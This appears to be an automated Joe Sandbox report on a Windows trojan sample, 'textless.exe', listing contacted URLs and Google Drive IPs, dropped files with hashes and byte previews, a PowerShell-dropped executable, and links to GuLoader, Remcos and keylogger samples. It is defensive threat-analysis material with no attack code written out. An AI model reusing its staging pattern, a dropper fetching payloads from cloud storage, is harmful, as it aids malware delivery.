                                            https://www.google.comVersificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://g.live.com/odclientsettings/Prod1C:svchost.exe, 00000004.00000003.1203307470.0000025524E59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdVersificator.exe, 0000000B.00000001.1494393684.00000000005F2000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                  		high
                                                  http://nsis.sf.net/NSIS_Errortextless.exe, textless.exe, 00000000.00000000.876802656.0000000000409000.00000008.00000001.01000000.00000003.sdmp, textless.exe, 00000000.00000002.925012774.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Versificator.exe, 0000000B.00000000.1493934268.0000000000409000.00000008.00000001.01000000.0000000B.sdmpfalse
                                                    		high
                                                    https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1495736567.0000000004C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/wssvchost.exe, 00000004.00000002.2119751877.000002551FAA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.google.com/Versificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                  		high
                                                                  http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdVersificator.exe, 0000000B.00000001.1494393684.00000000005F2000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                    		high
                                                                    https://apis.google.comVersificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1495736567.0000000004C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        216.58.212.142
                                                                        		drive.google.comUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        142.250.185.97
                                                                        		drive.usercontent.google.comUnited States
                                                                        		15169GOOGLEUSfalse

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1633447
                                                                        Start date and time:2025-03-10 11:22:22 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 8m 58s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:15
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:textless.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@9/25@2/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 60%
                                                                        HCA Information:
                                                                        • Successful, ratio: 95%
                                                                        • Number of executed functions: 89
                                                                        • Number of non-executed functions: 276
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 2.16.185.191, 20.109.210.53, 52.149.20.212
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.f.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target 0ogHncCUa.exe, PID 5556 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6504 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        06:23:20API Interceptor37x Sleep call for process: powershell.exe modified
                                                                        06:23:51API Interceptor2x Sleep call for process: svchost.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        No context

                                                                        Domains

                                                                        No context

                                                                        ASNs

                                                                        No context

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        37f463bf4616ecd445d4a1937da06e19N4533DWG.exeGet hashmaliciousFormBookBrowse
                                                                        • 216.58.212.142
                                                                        • 142.250.185.97
                                                                        Commercial invoice and dhl awb tracking details.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 216.58.212.142
                                                                        • 142.250.185.97
                                                                        CO894GOV2O25.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 216.58.212.142
                                                                        • 142.250.185.97
                                                                        RFQ_25-03010#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 216.58.212.142
                                                                        • 142.250.185.97
                                                                        DIR-A_JY4878249#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 216.58.212.142
                                                                        • 142.250.185.97
                                                                        REQ DAMMAM HO PROJECT.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 216.58.212.142
                                                                        • 142.250.185.97
                                                                        Salary List_pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 216.58.212.142
                                                                        • 142.250.185.97
                                                                        REQ DAMMAM HO PROJECT.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 216.58.212.142
                                                                        • 142.250.185.97
                                                                        URGENTE Ref.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 216.58.212.142
                                                                        • 142.250.185.97

                                                                        Dropped Files

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dllURGENTE Ref.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            Hornswoggle.exeGet hashmaliciousGuLoaderBrowse
                                                                              Hornswoggle.exeGet hashmaliciousGuLoaderBrowse
                                                                                Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    anziOUzZJs.exeGet hashmaliciousRemcosBrowse
                                                                                      SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exeGet hashmaliciousUnknownBrowse
                                                                                        PTFE Coated Butterfly Valve Picture#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                                                                                          cuenta iban-ES65.exeGet hashmaliciousFormBook, GuLoaderBrowse

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.7066991545728124
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqY:2JIB/wUKUKQncEmYRTwh0U
                                                                                            MD5:69744EB1CD0B9B728B090BEDEE8BAADE
                                                                                            SHA1:00095F4911A245292F836D7448F14AB736541001
                                                                                            SHA-256:B59D5DA0A3B8FCF8358F3C7D3F1F5B575649CDDEE85030A126BAC62FDEA92592
                                                                                            SHA-512:5E7D5FEC4529A7AB3679C7AD94E00E3FEBCF8A2EF38A53A3081C311CE9842717AB3F422DC521DD5B7D26D481F61B1D06F22429FBD448F92446B48FA6E276B9E4
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x10929ea7, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.789988174585782
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:7SB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:7azaPvgurTd42UgSii
                                                                                            MD5:6C1E8DAE7E7348B1479EFCC663B51B9A
                                                                                            SHA1:DA15D64155FF726CDD42BD4D760A699E8299C06B
                                                                                            SHA-256:DCBFAC28423AD9FD720F0B6BF7B7972EE31EF4B9B69AB3C69E420F335347D947
                                                                                            SHA-512:E1FE1820727BE4FA06EE3719BD885D754D5A283C77EB9D9DA710C8D28998430F26A71EBC3D2E97BA404F2AA5A6AC414D9154C9A14E02890F1CC4448858F59071
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:....... ...............X\...;...{......................0.`.....42...{5.3....}s.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{.....................................y3....}......................3....}s..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):16384
                                                                                            Entropy (8bit):0.08130215765453098
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:7Sl8Yeh8+YoRXyqt/57Dek3J0glvmrllYllEqW3l/TjzzQ/t:G6zhmMbR3t0Nxemd8/
                                                                                            MD5:42A63AB806F1BFB39F2588E4300B2783
                                                                                            SHA1:E1A3C26E10C49D4F0D2BF02EF86669F24FBB0BB1
                                                                                            SHA-256:8ECB182B630BA45FFB0B2D3C7447A99ACD554F1ED350B2EE66031C21A83FF443
                                                                                            SHA-512:AEC39C77E0986E61CFEFB588AF5AB9533F9211CCFA3B13597069FA47E515A0B7E3F5B54B46D56E05AC75A5D9F77C54DCE4650DF2FDC95E8102A798D1CA7C2FBE
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:z........................................;...{..3....}s.42...{5.........42...{5.42...{5...Y.42...{59....................3....}s.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):53158
                                                                                            Entropy (8bit):5.062687652912555
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                            MD5:5D430F1344CE89737902AEC47C61C930
                                                                                            SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                            SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                            SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                            C:\Users\user\AppData\Local\Temp\Versificator.exe

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Category:dropped
                                                                                            Size (bytes):621676
                                                                                            Entropy (8bit):7.675891095317541
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:JowisraETWNMHwQsNNG14vkM46P/wyeqwvcinEFAKSN+qq/9lX97:Jow/ra8WKQlM14h46P/wAYSLqq/7X97
                                                                                            MD5:9E8270179F04D867463A09AF7EE36E32
                                                                                            SHA1:E32B5FF6D109B529112F35C8F639FBB1BB5F4986
                                                                                            SHA-256:CC357E0C0D1B4B0C9CDAAA2F7FD530C7FCEE6C62136462C1533D50971F97D976
                                                                                            SHA-512:8D6BC637FE29007211BD9CCCC84B64C5DBFCC9083CB9097E2427E32E2DE4D6D957928184717EE2B4FEBA9A75631D87747639DA74682C65E82922D715C1F627B7
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L....c.W.................^..........+2.......p....@.......................................@.................................(t.......0..`............................................................................p...............................text....].......^.................. ..`.rdata..F....p.......b..............@..@.data................v..............@....ndata.......@...........................rsrc...`....0.......z..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\Versificator.exe:Zone.Identifier

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5e2wdz1i.psg.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zn5eycm.ke1.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4p4feem.mv3.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yobj310r.l5d.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\nsr1F1C.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):720580
                                                                                            Entropy (8bit):6.485505381740637
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:Rt6Wpll2EdfAaOlchxabYdELr4+9DPX4DEU0DkniIqYCm+kYdwxCSxmebTyiTKq6:/XiaOlYYsdELhUakSkYdoC8Lbary08M
                                                                                            MD5:BA5A3AD27F191F7A7A5B7898A62CDC37
                                                                                            SHA1:A95A46336A039B55348A75DCDB0D018FD9C8F044
                                                                                            SHA-256:A11D5E21AAF093C246AE39C29E0E46AE0CFA5B2724BDD1A14278C2236F9414C8
                                                                                            SHA-512:1996D66904E18D8E890065ED34E6C40D8F10795400EC62BB8A1E4AF13CEB4837B3E6F766B744895171A069ED85EA133F28DE7D60646BCB1593BC2C36FB4481FE
                                                                                            Malicious:false
                                                                                            Preview:@ ......,...................Z...........z.......@ ..........................................................................................................................................................................................................................................J...`...............j...............................................................................................................................@...............2.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):6656
                                                                                            Entropy (8bit):4.994861218233575
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
                                                                                            MD5:B648C78981C02C434D6A04D4422A6198
                                                                                            SHA1:74D99EED1EAE76C7F43454C01CDB7030E5772FC2
                                                                                            SHA-256:3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
                                                                                            SHA-512:219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: URGENTE Ref.exe, Detection: malicious, Browse
                                                                                            • Filename: lkETeneRL3.exe, Detection: malicious, Browse
                                                                                            • Filename: Hornswoggle.exe, Detection: malicious, Browse
                                                                                            • Filename: Hornswoggle.exe, Detection: malicious, Browse
                                                                                            • Filename: Overheaped237.exe, Detection: malicious, Browse
                                                                                            • Filename: 66776676676.exe, Detection: malicious, Browse
                                                                                            • Filename: anziOUzZJs.exe, Detection: malicious, Browse
                                                                                            • Filename: SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe, Detection: malicious, Browse
                                                                                            • Filename: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Detection: malicious, Browse
                                                                                            • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Hoftes.Ido

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):331022
                                                                                            Entropy (8bit):7.683787359121338
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:aWpll2EdfAaOlchxabYdELr4+9DPX4DEU0DkniIqYCm+kYdwx9:nXiaOlYYsdELhUakSkYdo9
                                                                                            MD5:2370D69B3C944CBF8951CA39D008A776
                                                                                            SHA1:F6C7E07735E02BBBA47EA03741841D8CD323464B
                                                                                            SHA-256:5B77E53961B38A309585CD1843DA47CFD102A03B029347A27F72666BE6C03AED
                                                                                            SHA-512:49571DCFDE3666AC91010437E03342433273800C70F207B8DE9968D63C455A8CCB711AA3D4209F0A95AC095BCA5430130ECEAEC2458494167A12FD4FADD8C7F4
                                                                                            Malicious:false
                                                                                            Preview:.......**..++........X...............//////.....33...~.........................d.d............::::.m..y................................,,..............9.{............. ......................zz...........H....................sssssssss....+..R.}...........3.................uuu.?.................................55555555555.................................777777..YY....ss....O..[..................................GG...ZZ.ll..........G....p.............ss... ..t..0................................0.......R.5........{...c......22.......~........R............l...W.........=.......e.uu............::..N............................ll..............G..........N.............nn.f......`.......}}. .....````............{...........v...kk................................5.........66.........a............[[[[[.......B................R..ggg......hh.......v.\.......................[[................f..ff.............................................oo..........ll............5...............................

                                                                                            C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\Resinlike\Dareful.ini

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):233
                                                                                            Entropy (8bit):4.218275149059182
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:5qlvVqDqHfspV6rvAYEOElcTgWNKnX4iEda:5q32pYNEO5mnX4nk
                                                                                            MD5:C3DFE131F54C74B2E7B579D1DFD08F6D
                                                                                            SHA1:5AE446BC9D0C1997D20987F8660AE5C7ABC1712D
                                                                                            SHA-256:35370D35DCD5D967D9517571DAB47B3BF8F34E0B385E9C57A22579CBE7BA1ACC
                                                                                            SHA-512:6E5461A9CF59E1384C41B34EDAC861983C2344BD4C90314579C87D0AEA8AE56D4B4707537074A1E7BE4E09506A1AF148E03330A0CAC272306158173DD0E10E3D
                                                                                            Malicious:false
                                                                                            Preview:..........Concomitant forngtelsernes trip straffefaststtelsernes wedgeable rooibok gutturonasal hemateins blrehalskirtel nudlers asparagic..Healthiest besttelsestidernes neuratrophia potlikker fodtudser stenkulsnaftaens moncassin....

                                                                                            C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\Resinlike\Omkld\Cortisones54\unseriousness.jpg

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 223x403, components 3
                                                                                            Category:dropped
                                                                                            Size (bytes):17860
                                                                                            Entropy (8bit):7.963376709350411
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:l6uCVuoDLjmXdXKqqjQ/Edx4jPQJs0RCWQBJrlhP54iEEVP48lt8Z2SDu:l63zMXKqTcdCPQJtRCBBtlhBdBVPF0Zi
                                                                                            MD5:A8DA0E9EA106CAE32FB695A6358C54B9
                                                                                            SHA1:73C3A9DE5CA3DFD506A25987E04107C2F96D1DEB
                                                                                            SHA-256:139F8AEAAE1BB1B8E5691FC1040BD508D01B4E322BFAD7DC4B77E79F78FADE86
                                                                                            SHA-512:CABF69FA7C1DC06D4682130746F656FE7926B0ACCB823EE8B8071A957883F6CC4EBF310147E6FD6FAB10E1DDF0F0730A45AABDBF90B74582A929FD39427B87CD
                                                                                            Malicious:false
